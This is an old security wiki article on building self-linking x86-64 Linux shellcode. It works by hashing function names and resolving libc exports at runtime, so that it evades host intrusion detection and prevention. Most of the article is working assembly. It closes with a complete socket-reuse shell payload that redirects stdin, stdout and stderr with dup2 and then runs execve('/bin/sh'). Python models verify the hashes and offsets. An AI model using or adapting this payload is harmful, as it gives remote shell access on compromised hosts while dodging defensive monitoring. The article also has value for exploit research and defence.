Shellcode/Dynamic

From NetSec
Latest revision as of 03:35, 25 April 2013

Dynamic shellcode, or self-linking shellcode, is built to evade several types of host-layer countermeasures from security infrastructure (such as HIDS and HIPS engines) that can prevent the execution of traditional 'unlinked' null-free shellcode. It does so by, for example, containing no interrupts, syscalls, or plaintext function strings.


The code and ideas discussed here are part of an all-encompassing shellcode portal. Everything described here and the full source of any given code is available in the appendix, as well as in the downloadable shellcodecs package.


Justification

Most security infrastructure components do runtime analysis based on the contents of RAM in both data and executable marked segments. Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel. Others may monitor the functionality of _dl_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls. Many of these systems will be alerted by applications trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _dl_runtime_resolve, _dl_fixup, dlopen, dlclose, or dlsym to import a function not listed in its import table. Additionally, using functions such as dlopen() and dlsym() requires plaintext strings, so an analyst can reverse engineer the payload quickly. This is another problem presented by traditional null-free shellcode.


A dynamic shellcode engine is able to solve these problems. By avoiding registers used by the C calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code. This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the operating system. Additionally, function hashing is used to prevent function names from displaying within string data, solving the problems with standard null-free shellcode listed above.

The C Calling convention's impact

  • The usual format for a system call or libc function invocation:
   function_call(%rax) = function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)
  • This is the syscall register order. Under the System V AMD64 calling convention, libc functions take their fourth argument in %rcx rather than %r10.
  • The return value is normally placed in the %rax register. When a struct pointer is passed as an argument, the function writes its results through that pointer.

It follows that a linker is free to use the following registers, since none of them carries an argument in the format above:

  %rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15

Most of these registers can get blown away or destroyed by various libc functions; %rbx, however, is reserved for "developer use" by libc. When writing a dynamic linker, function arguments must be preserved so that a developer can easily write dynamically integrated code. To that end, this linker takes %rbx as the base pointer to a library and %rbp for a function hash. This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9. The %rcx register is used as the pointer to the invoke_function label, and may need to be preserved between function invocations.

Function hashing

Additional labels have been added to make this more readable.

This functionality expects %rdx to be zero and a pointer to a string in %rsi. It then makes a one-way 32-bit hash of the string and places the hash into %rsi.

  • First, the registers used by the hasher other than %rsi are preserved:

calc_hash:
 
preserve_regs:
  push %rax
  push %rdx
 
  • The %rdx register is used as a zreg, or zero register by the code that invokes the hasher. This makes it possible to zero out the %rax register with a simple push/pop mov emulation:
 
initialize_regs:
  push %rdx
  pop %rax
 
  • Next, the direction flag is cleared. This is important because lodsb is used during the hashing process and the state of the direction flag left by the vulnerable application is unknown.
   cld
 
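  • To make the one-way 32-bit hash, %edx is rotated left by 12 (0xC) bits and the byte loaded into %al is then added to it, once for every byte of the string. When the byte loaded by lodsb is null, the hash of the string has been fully calculated. The null byte still passes through the rotate and add, so the finished hash includes one final rotation.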
calc_hash_loop:
  lodsb
  rol $0xc, %edx
  add %eax, %edx
  test %al, %al
  jnz calc_hash_loop
 
  • Now use push and pop as a mov emulation again to place the hash into %rsi:
 
calc_done:
  push %rdx
  pop %rsi
 
  • Finally, restore the preserved registers:
restore_regs:
  pop %rdx 
  pop %rax
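 
The hashing loop above can be modelled outside of assembly, which is handy for checking hash constants by hand. The following is a minimal Python sketch, not the hash-generator tool from shellcodecs; the names rol32 and calc_hash are chosen here for illustration, and it assumes %eax holds only the byte loaded by lodsb, as the zeroing step above arranges.

```python
def rol32(value: int, count: int) -> int:
    """Rotate a 32-bit value left by `count` bits."""
    value &= 0xFFFFFFFF
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def calc_hash(name: bytes) -> int:
    """Model of calc_hash_loop: rotate, add the byte, stop after the null."""
    h = 0                                # %edx starts at zero
    for byte in name + b"\x00":          # lodsb also consumes the terminating null
        h = rol32(h, 12)                 # rol $0xc, %edx
        h = (h + byte) & 0xFFFFFFFF      # add %eax, %edx
    return h


if __name__ == "__main__":
    for symbol in (b"exit", b"dup2", b"execve", b"getpeername"):
        print(symbol.decode(), hex(calc_hash(symbol)))
```

For "exit" this yields 0x696c4780, the constant pushed in the interface example, and the other three names yield the constants used in the dynamic shell.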
 

Dynamic section traversal to the GOT

  • For the executables targeted here (not position-independent, loaded at 0x00400000), the dynamic section's program header for the currently executing process has a VMA of 0x00400130. The following code can be used to get there without using any null bytes:
 
_start:
  push $0x400130ff
  pop %rbx
  shr $0x8, %ebx
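 
The shift trick above can be checked with a few lines of Python. This is only an illustrative sketch: the helper name has_null_byte is hypothetical, and the offset arithmetic assumes a 64-byte ELF64 header, 56-byte program headers, and PT_DYNAMIC as the fifth program header, none of which the text states outright.

```python
import struct


def has_null_byte(value: int) -> bool:
    """True if the little-endian 32-bit encoding of value contains 0x00."""
    return 0 in struct.pack("<I", value)


padded = 0x400130FF          # immediate used by `push $0x400130ff`
target = padded >> 8         # effect of `shr $0x8, %ebx`

# Assumed layout: ELF64 header, then program headers of 56 bytes each,
# with p_vaddr at offset 0x10 inside the fifth one (index 4).
ELF64_EHDR_SIZE = 0x40
ELF64_PHDR_SIZE = 0x38
P_VADDR_OFFSET = 0x10
field_offset = ELF64_EHDR_SIZE + 4 * ELF64_PHDR_SIZE + P_VADDR_OFFSET

if __name__ == "__main__":
    print(hex(target), has_null_byte(0x00400130), has_null_byte(padded))
    print(hex(field_offset))
```

The padded immediate encodes without a zero byte while the plain address does not, and under the stated layout assumption the field offset works out to 0x130.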
 
  • The pointer to the dynamic section is extracted and the length of the dynamic section is added to it. The GOT (Global Offset Table) is immediately after the dynamic section. By calculating the offset in this fashion, the GOT can be traversed without reading its location from the headers.
 
fast_got:
  mov (%rbx), %rcx
  add 0x10(%rbx), %rcx
 

Extracting a library pointer

  • This code extracts a pointer to an arbitrary function inside of libc from the GOT. An alternative to libc is at 0x18(%rcx), a pointer to _dl_runtime_resolve from the ld-linux shared object library.
 
extract_pointer:
  mov 0x20(%rcx), %rbx
 
  • Now look for the base pointer of the binary selected for importing by searching for \x7f followed by the text string "ELF". Because x86-64 is little-endian, those four bytes read as the 32-bit value 0x464c457f, so the comparison uses that constant while the loop steps backwards through memory one byte at a time:
 
find_base:
  dec %rbx
  cmpl $0x464c457f, (%rbx)
  jne find_base
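 
The byte order behind the 0x464c457f constant, and the backwards scan itself, can be illustrated on an ordinary byte buffer. This Python sketch uses a synthetic buffer rather than process memory, and the function name find_base is borrowed from the label above purely for readability. Unlike the assembly, it stops with an error if the start of the buffer is reached.

```python
import struct

ELF_MAGIC = b"\x7fELF"

# Little-endian view of the four magic bytes, as cmpl sees them.
(MAGIC_AS_U32,) = struct.unpack("<I", ELF_MAGIC)


def find_base(memory: bytes, start: int) -> int:
    """Walk backwards from `start` until the ELF magic is found."""
    pos = start
    while True:
        pos -= 1                                   # dec %rbx
        if pos < 0:
            raise ValueError("ELF magic not found")
        (word,) = struct.unpack_from("<I", memory, pos)
        if word == MAGIC_AS_U32:                   # cmpl $0x464c457f, (%rbx)
            return pos


if __name__ == "__main__":
    image = b"\x00" * 16 + ELF_MAGIC + b"\x90" * 64
    print(hex(MAGIC_AS_U32), find_base(image, 50))
```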
 

Staging the user defined code

  • Now that a base pointer has been calculated, it is time to stage the developer or user-defined code. To make invoke_function re-usable from a register, a getPc via %rcx is used: the call at the startup label pushes the address of the instruction that follows it, which is invoke_function, and __initialize_world pops that address into %rcx before jumping to the _world label, never returning. This is how the address of invoke_function is stored in the %rcx register, allowing developers to access it efficiently.
 
jmp startup
 
__initialize_world:
  pop %rcx
  jmp _world
 
startup:
  call __initialize_world
invoke_function:
  ...
_world:
  # user-defined code goes here
 

The interface

The runtime linker developed here allows user-defined code to start at the _world label. The interface allows a developer to place a function hash into the %rbp register and then execute call *%rcx instead of a syscall. This example describes the process of moving from a kernel syscall for exit(0) to using the linker's API to invoke `exit(0)' (full source).

  • Beginning with the unlinked form of exit:
 
exit:
  push $0x3c
  pop %rax
  xor %rdi, %rdi
  syscall
 


  • The hash for "exit" is calculated using the hash generator provided with shellcodecs:

localhost:~ $ ./hash-generator exit|hexdump -C
00000000  69 6c 47 80                                      |ilG.|


  • Then the hash is placed into %rbp. When the x64 register arguments have been set, call *%rcx is used to invoke the function:
 
_world:
  push $0x696c4780
  pop %rbp
  xor %rdi, %rdi
  call *%rcx
 
Developers should take care to preserve %rcx when invoking functions which may destroy the register, or remove this limitation by changing the register popped in the __initialize_world label.

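The invoking of functions

  • A comment has been provided in case developers forget the interface functionality:
 
#
#  Takes a function hash in %rbp and base pointer in %rbx
#  >Parses the dynamic program headers of the ELF64 image
#  >Uses ROP to invoke the function on the way back to the
#  -normal return location
#
#  Returns results of function to invoke.
#
 
  • Every register that may interact with libc, along with any register used by the linker, must be preserved so that it can be restored for function invocation. The %rbp register is preserved twice because the first copy is overwritten with a pointer to the desired function before returning. This allows the shellcode to return from the desired function back to developer-defined code.
 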
invoke_function:
  push %rbp
  push %rbp
  push %rdx
  push %rdi
  push %rax
  push %rbx      
  push %rsi
 
  • Now zero the %rdx register and place the function hash into %rdi for future comparison.
set_regs:
  xor %rdx, %rdx
  push %rbp
  pop %rdi
 
  • Then the base pointer of the desired library to import from is placed into %rbp:
 
copy_base:
  push %rbx
  pop %rbp
 
  • This is a hack to get to the dynamic offset. The value stored at 0x130(%rbx) must be added to %rbx as a full eight-byte register; adding to %ebx instead would chop %rbx in half. Writing the displacement 0x130 directly would also put null bytes into the instruction, so the offset is reached using indexed addressing mode instead. Because $0x4c * 4 = 0x130, and %rbx is the base pointer, the following code will suffice:
read_dynamic_section:
  push $0x4c
  pop %rax
  add (%rbx, %rax, 4), %rbx
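 
The arithmetic behind this addressing hack is small enough to verify directly. The sketch below is illustrative only: effective_address is a hypothetical helper that models how a base, index, and scale combine, and the base value is an arbitrary placeholder rather than a real load address.

```python
import struct


def effective_address(base: int, index: int, scale: int, disp: int = 0) -> int:
    """Model of x86 base + index*scale + displacement addressing."""
    return base + index * scale + disp


# A 32-bit displacement of 0x130 would encode with two zero bytes.
disp32_bytes = struct.pack("<i", 0x130)

if __name__ == "__main__":
    base = 0x7F0000000000                     # placeholder library base
    print(hex(effective_address(base, 0x4C, 4) - base))
    print(disp32_bytes.hex())
```

The scaled index reaches the same offset as a plain 0x130 displacement while the only immediate in the code is the single byte 0x4c.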
 
  • Try to find the function export table. Typically, this table is called .dynsym, or the dynamic symbol table. Do this by iterating through the 16-byte entries of the dynamic section, checking the type tag of each entry:
 
check_dynamic_type:
  add $0x10, %rbx
  cmpb $0x5, (%rbx)
  jne check_dynamic_type
 
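  • Once the %rbx register is positioned at the string table entry (type 0x5, DT_STRTAB), place the absolute address of the string table into %rax and the absolute address of the dynamic symbol table into %rbx. The symbol table address is read from the entry that follows, so this relies on the symbol table entry coming directly after the string table entry.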
 
string_table_found:
  mov 0x8(%rbx), %rax       # %rax is now location of dynamic string table
  mov 0x18(%rbx), %rbx      # %rbx is now a pointer to the symbol table.
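 
The walk over the dynamic entries can be modelled on a hand-built table. This Python sketch is an illustration under stated assumptions: the table contents and addresses are invented, find_tables is a hypothetical name, and a bounds check is added that the assembly does not have. The tag values and the 16-byte entry size come from the ELF64 format.

```python
import struct

DT_NULL, DT_NEEDED, DT_HASH, DT_STRTAB, DT_SYMTAB = 0, 1, 4, 5, 6
ENTRY_SIZE = 0x10  # 8-byte tag followed by an 8-byte value


def build_dynamic(entries):
    """Pack (tag, value) pairs into a synthetic dynamic section."""
    return b"".join(struct.pack("<qQ", tag, value) for tag, value in entries)


def find_tables(dynamic: bytes):
    """Mirror check_dynamic_type and string_table_found."""
    offset = 0
    while True:
        offset += ENTRY_SIZE                      # add $0x10, %rbx
        if offset + 2 * ENTRY_SIZE > len(dynamic):
            raise ValueError("DT_STRTAB entry not found")
        if dynamic[offset] == DT_STRTAB:          # cmpb $0x5, (%rbx)
            break
    (strtab,) = struct.unpack_from("<Q", dynamic, offset + 0x8)
    (symtab,) = struct.unpack_from("<Q", dynamic, offset + 0x18)
    return strtab, symtab


if __name__ == "__main__":
    table = build_dynamic([
        (DT_NEEDED, 1),
        (DT_HASH, 0x2000),
        (DT_STRTAB, 0x3000),      # invented addresses
        (DT_SYMTAB, 0x1000),
        (DT_NULL, 0),
    ])
    print([hex(v) for v in find_tables(table)])
```

Note that the loop advances before its first comparison, so the first entry is never examined, and that only the low byte of each tag is compared, exactly as in the assembly.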
 
  • Here, %rbx is advanced to the next export (each symbol table entry is 0x18 bytes) and a pointer to that export's name string is placed into %rsi for hashing:
 
check_next_hash:
  add $0x18, %rbx
  push %rdx
  pop %rsi
  xorw (%rbx), %si
  add %rax, %rsi
 
 
  • The calc_hash label is invoked as described above for function hashing:
 
calc_hash:
   ...
 
  • Compare the function hash of the current export with the hash of the desired import. If the hashes are not equal, loop to the next export.
 
check_current_hash:
  cmp %esi, %edi
  jne check_next_hash
 
  • Once the hash is found, its function offset is located at 0x8(%rbx) for four bytes. %rdx is used as a zreg in this equation to access the four bytes without nulls - and add them to %rbp, the base pointer:
 
found_hash:
  add 0x8(%rbx,%rdx,4), %rbp
 
  • Here, the first preserved copy of %rbp is overwritten with the location of the desired function:
 
  mov %rbp, 0x30(%rsp)
 
  • Then restore all registers. This will align the return pointer to point at the desired function, and the pointer immediately following it in the call stack points to the original return pointer, the location after the code which invoked this function.
  pop %rsi
  pop %rbx
  pop %rax
  pop %rdi
  pop %rdx
  pop %rbp
  ret
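 
The stack bookkeeping in invoke_function is easier to follow as a model. The Python sketch below treats the stack as a list of eight-byte slots; the function name and the register values are invented for illustration, and the lookup work done between the pushes and the pops is left out.

```python
PUSH_ORDER = ("rbp", "rbp", "rdx", "rdi", "rax", "rbx", "rsi")
POP_ORDER = ("rsi", "rbx", "rax", "rdi", "rdx", "rbp")


def model_invoke_function(regs, return_address, target):
    """Return (restored registers, address ret jumps to, remaining stack)."""
    stack = [return_address]          # pushed by `call *%rcx`; end of list = top
    for name in PUSH_ORDER:
        stack.append(regs[name])

    # mov %rbp, 0x30(%rsp): six slots below the top is the first saved %rbp.
    slot = len(stack) - 1 - (0x30 // 8)
    stack[slot] = target

    restored = {name: stack.pop() for name in POP_ORDER}
    jump_to = stack.pop()             # ret consumes the overwritten slot
    return restored, jump_to, stack


if __name__ == "__main__":
    regs = {"rbp": 0x696C4780, "rdx": 3, "rdi": 4, "rax": 5, "rbx": 6, "rsi": 7}
    restored, jump_to, remaining = model_invoke_function(regs, 0x401000, 0x7F00DEAD)
    print(restored == regs, hex(jump_to), [hex(v) for v in remaining])
```

After the six pops every register holds its saved value, ret transfers control to the resolved function, and the caller's original return address is left on top of the stack for that function to return through.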
 

The dynamic shell

  • Once added to the linker, this becomes a 268-byte dynamic port of the 115-byte socket-reuse payload. There are a few ways to optimize it that will be left for the reader to discover.
 
_world:
  movl $0xf8cc01f7, %ebp   # hash of getpeername() is in %rbp
  push $0x02
  pop %rdi
 
make_fd_struct:
  lea -0x14(%rsp), %rdx
  movb $0x10, (%rdx)
  lea 0x4(%rdx), %rsi # move struct into rsi
 
loop:
  inc %di
  jz exit
 
stack_fix:
  lea 0x14(%rdx), %rsp
 
get_peer_name:
  sub $0x20, %rsp
  push %rcx
  call *%rcx               # getpeername(counterfd,sockaddr_in)
  pop %rcx
 
check_pn_success:
  test %al, %al
  jne loop
 
  # If successful, rbx and rax are 0
check_ip:
  push $0x1b
  pop %r8
  mov $0xfeffff80, %eax
  not %eax
  cmpl %eax, (%rsp,%r8,4)
  jne loop
 
check_port:
  movb $0x35, %r8b
  mov $0x2dfb, %ax
  not %eax
  cmpw %ax, (%rsp,%r8,2)
  jne loop
 
  push $0x70672750
  pop %rbp                # Function hash of dup2() is in rbp
 
reuse:
  xor %rdx, %rdx
  push %rdx
  push %rdx
  pop %rsi
 
dup_loop:       # redirect stdin, stdout, stderr to socket
  push %rcx
  call *%rcx    # dup2(sockfd,std[err|in|out]);
  pop %rcx
  inc %esi
  cmp $0x4, %esi
  jne dup_loop
 
  movl $0xf66bbb37, %ebp         # Place the function hash for execve() into %rbp
 
  pop %rdi
  push %rdi                      
  push %rdi
  pop %rsi                     
  pop %rdx                       # Null out %rsi and %rdx (second and third argument)
  mov $0x68732f6e69622f6a,%rdi   # move 'hs/nib/j' into %rdi
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
  push %rdi      
  push %rsp 
  pop %rdi                       # %rdi is now a pointer to '/bin/sh\0'
 
  call *%rcx                     # execve('/bin/sh',0,0);